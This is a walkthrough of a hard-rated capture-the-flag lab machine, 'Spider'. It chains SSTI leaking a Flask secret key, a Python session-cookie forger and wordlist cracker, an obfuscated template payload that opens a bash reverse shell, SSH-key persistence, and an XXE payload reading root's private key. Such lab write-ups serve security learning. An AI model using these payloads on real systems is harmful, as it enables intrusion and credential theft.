In this post, I would like to share a walkthrough of the Spider machine.
This machine is rated Hard.
Information Gathering on Spider machine
Once the VPN connection is up, we can start information gathering on the machine by running nmap -sC -sV -Pn <IP Address> (-Pn skips host discovery, which matters when the box drops ICMP).
From the result, we have a few open ports:
- 22: OpenSSH 7.6p1
- 80: nginx 1.14.0
We need to add the machine's hostname, spider.htb, to /etc/hosts so that the browser can resolve it.
Let's open the browser and go straight to the website.
From the website interface, we notice that it is an online shop selling items, chairs in particular.
Let's run gobuster against the site; it finds a few directories:
- /cart
- /checkout
- /index
- /login
- /logout
- /main
- /register
Gaining Access
Visiting /login shows an Admin Login form, but we don't have any credentials to log in with yet.
Let's look at /register; we can register an account here.
Now we can log in using the UUID provided at registration together with our password.
We are in the dashboard, and we can see some menus on the left side of the website.
While roaming around the website, I found that it is vulnerable to Server-Side Template Injection (SSTI). I spotted the vulnerability by reading the page source.
Let's do some research on Server-Side Template Injection; PortSwigger has a useful write-up on it.
Let's try the payloads used in that article, starting with {{7 * 7}} in the username field of the registration page.
After registering, the interface appears as shown in the screenshot above. To see the result, open the User Information page: the expression has been evaluated rather than echoed back, which confirms the injection.
Now replace {{7 * 7}} with {{config}} in the username column of the registration page.
The output appears in the User Information section: the application's Flask config object is rendered in place of the username, and that config includes the SECRET_KEY used to sign the session cookies. For a clearer view, copy-paste it into a text editor, which gives something like the view above.
There are two ways to get a new UUID and password/cookie from here.
Step 1
For this route, we need to install flask-unsign on our machine; given the SECRET_KEY from the config dump, it can decode the current session cookie and sign a new one.
We need to get the new UUID and cookie so that we can paste them into the browser. Once that is done, refresh the page and there you go!
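What flask-unsign does under the hood is worth seeing once, because it explains why leaking SECRET_KEY through {{config}} is game over for the session. The following is an added example, not code from the write-up or from the flask-unsign project: it reimplements Flask's session-cookie format with the standard library only (URL-safe base64, optional zlib compression marked by a leading dot, a timestamp segment, and an HMAC-SHA1 over the first two segments, keyed with HMAC-SHA1(SECRET_KEY, "cookie-session") as itsdangerous derives it). The secret key and UUID below are constructed values, not the machine's.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Iterable, Optional

# Salt Flask's SecureCookieSessionInterface passes to its URLSafeTimedSerializer.
SALT = b"cookie-session"


def _b64e(raw: bytes) -> bytes:
    # itsdangerous-style base64: URL-safe alphabet, padding stripped
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(data) -> bytes:
    if isinstance(data, str):
        data = data.encode()
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def decode_session(cookie: str) -> dict:
    """Read the session payload without checking the signature (flask-unsign --decode)."""
    compressed = cookie.startswith(".")  # a leading dot marks a zlib-compressed payload
    body = cookie[1:] if compressed else cookie
    raw = _b64d(body.split(".")[0])
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def sign_session(data: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Build a cookie Flask will accept for `data` (flask-unsign --sign)."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:
        payload = b"." + _b64e(compressed)
    else:
        payload = _b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    # itsdangerous 2.x stores the raw Unix time; 1.x subtracted a 2011-01-01 epoch
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = payload + b"." + _b64e(ts_bytes)
    sig = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
    return (value + b"." + _b64e(sig)).decode()


def verify_session(cookie: str, secret_key: str) -> bool:
    """True if the cookie's HMAC was produced with `secret_key`."""
    value, _, sig = cookie.encode().rpartition(b".")
    expected = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
    return hmac.compare_digest(expected, _b64d(sig))


def crack_secret(cookie: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline wordlist attack on the signing key (flask-unsign --unsign)."""
    for candidate in candidates:
        if verify_session(cookie, candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed values: the secret and UUID are examples, not the machine's.
    secret = "example-secret-key"
    cookie = sign_session({"uuid": "11111111-2222-3333-4444-555555555555"}, secret)
    print(cookie)
    print(decode_session(cookie), verify_session(cookie, secret))
```

With the real SECRET_KEY in hand, sign_session() lets you put any uuid you like into the session and the server cannot tell it from a cookie it issued itself; crack_secret() is the fallback when the key was not leaked but is weak enough for a wordlist.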
Step 2
For this route, I used sqlmap to get the UUID and password.
sqlmap asks a few questions during the run.
(Answer yes to the first question and no to the rest.)
After a while, we are given the UUID, name, and password as shown above.
Maintaining Access on Spider machine
Let's enter the UUID and password on the login page and click the Submit button.
Finally, we are in the admin panel as chiv.
Reading the Message Board section gives us a new directory location, which we can access.
The page shows a support ticket form. We can submit a template payload such as
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n <base64 encoded> | base64 -d | bash")["read"]() %} a {% endwith %}
## The base64-encoded string is the reverse shell command we want the target to run; encoding it keeps quotes, pipes and redirections out of the template's string literal ##
Before submitting the payload in the website interface, start an nc listener in our terminal.
We get a reverse shell connection back when we click the Submit button.
We can read the user flag in /home/chiv/ with the "cat user.txt" command.
Escalate to Root Privileges Access on Spider machine
Checking which ports are listening on the machine, I notice port 8080 is open; it was not in the nmap results (only 22 and 80 were), so it is only reachable locally, and port forwarding looks like the way to get at it.
My first attempt at port forwarding from the reverse shell did not work at all.
Since SSH is open, we can put our own SSH public key into /home/chiv/.ssh/authorized_keys (the user we have a shell as) and then SSH in as chiv with local port forwarding (ssh -L) to reach the service.
With the key in place, port forwarding works.
Opening the forwarded port in the browser shows a "Beta Login" page. Let's try to log in using chiv as the username.
We reach a dashboard. While roaming the source code and the site, I found code related to XXE (XML External Entity injection), which is explained in detail here.
Let's start Burp Suite and intercept the traffic to 127.0.0.1:8081, our local end of the forward.
Any username works for this step, but I chose &username; so that the request references the entity declared by the payload. I also notice there is version information in the request body.
We need to inject the following into the version field to get root's id_rsa rendered in the browser:
1.0.0--><!DOCTYPE foo [<!ENTITY username SYSTEM "/root/.ssh/id_rsa"> ]><!--
The version value sits inside an XML comment, so the payload first closes that comment, declares an external entity pointing at root's private key, and opens a new comment to swallow the rest of the original one; the username field then expands to the key. We get root's id_rsa in the browser and copy-paste it to our machine so that we can use it to SSH in.
** It took me multiple tries in the browser before the key showed up, so keep trying until you see the output as shown in the screenshot above **
For a clearer view, look at the key in the page source.
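To make the comment break-out and the entity expansion concrete, here is an added example, not code from the write-up or from the target application. The request shape is an assumption (the post does not show the beta-login XML); what the example relies on is only that the version string lands in a comment before the root element. A tiny resolver stands in for a backend parser with external entities enabled, reading from a constructed in-memory "file system", and the hardened variant refuses any DOCTYPE before parsing, which is what defusedxml does by default.

```python
import re
import xml.etree.ElementTree as ET

# Constructed request shape (assumed): the version string is echoed into a
# comment in the prolog, before the root element.
REQUEST_TEMPLATE = (
    '<?xml version="1.0"?>\n'
    '<!-- client version: {version} -->\n'
    '<root><data><username>{username}</username><password>x</password></data></root>'
)

# The injected version value from the write-up: close the comment, declare an
# external entity pointing at root's key, then reopen a comment to swallow " -->".
XXE_VERSION = '1.0.0--><!DOCTYPE foo [<!ENTITY username SYSTEM "/root/.ssh/id_rsa"> ]><!--'

# Constructed in-memory file system standing in for the target's disk.
FAKE_FS = {
    "/root/.ssh/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\n"
                         "(example key material)\n"
                         "-----END OPENSSH PRIVATE KEY-----\n",
}

ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+SYSTEM\s+"([^"]+)"\s*>')


def build_request(version: str, username: str) -> str:
    """What the client (or Burp, after editing) sends to the beta login."""
    return REQUEST_TEMPLATE.format(version=version, username=username)


def resolve_external_entities(xml_text: str, fs: dict) -> str:
    """Toy stand-in for a parser that honours SYSTEM entities: read each declared
    file and substitute it for every &name; reference."""
    entities = {name: fs.get(path, "") for name, path in ENTITY_RE.findall(xml_text)}
    return re.sub(r"&(\w+);", lambda m: entities.get(m.group(1), m.group(0)), xml_text)


def vulnerable_username(xml_text: str, fs: dict = FAKE_FS) -> str:
    """Backend that resolves external entities before reading the username."""
    expanded = resolve_external_entities(xml_text, fs)
    return ET.fromstring(expanded).find("./data/username").text


def hardened_username(xml_text: str) -> str:
    """Same backend with DTDs refused outright, so no entity can ever be declared."""
    if re.search(r"<!DOCTYPE", xml_text, re.IGNORECASE):
        raise ValueError("DTD/DOCTYPE not allowed")
    return ET.fromstring(xml_text).find("./data/username").text


def dtd_rejected(xml_text: str) -> bool:
    """True if the hardened backend refuses the document."""
    try:
        hardened_username(xml_text)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    evil = build_request(XXE_VERSION, "&username;")
    print(evil)
    print(vulnerable_username(evil))   # the "username" is now root's key
    print(dtd_rejected(evil))          # hardened backend: True
```

Because the expanded document still parses cleanly with ElementTree, the example also demonstrates that the break-out leaves well-formed XML: the original " -->" closes the comment opened at the end of the payload, which is why the trailing <!-- is needed.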
We need to restrict the permissions on the saved key with chmod 600 <name of the id_rsa file you saved>; ssh refuses keys that are readable by others, and sudo is not needed for a file we own.
Let's SSH into the machine as root with that key.
We can read the root flag with the "cat root.txt" command.
-THE END-
Happy Learning Guys!
Extra Information
The root hash in /etc/shadow can be used to unlock the official write-up.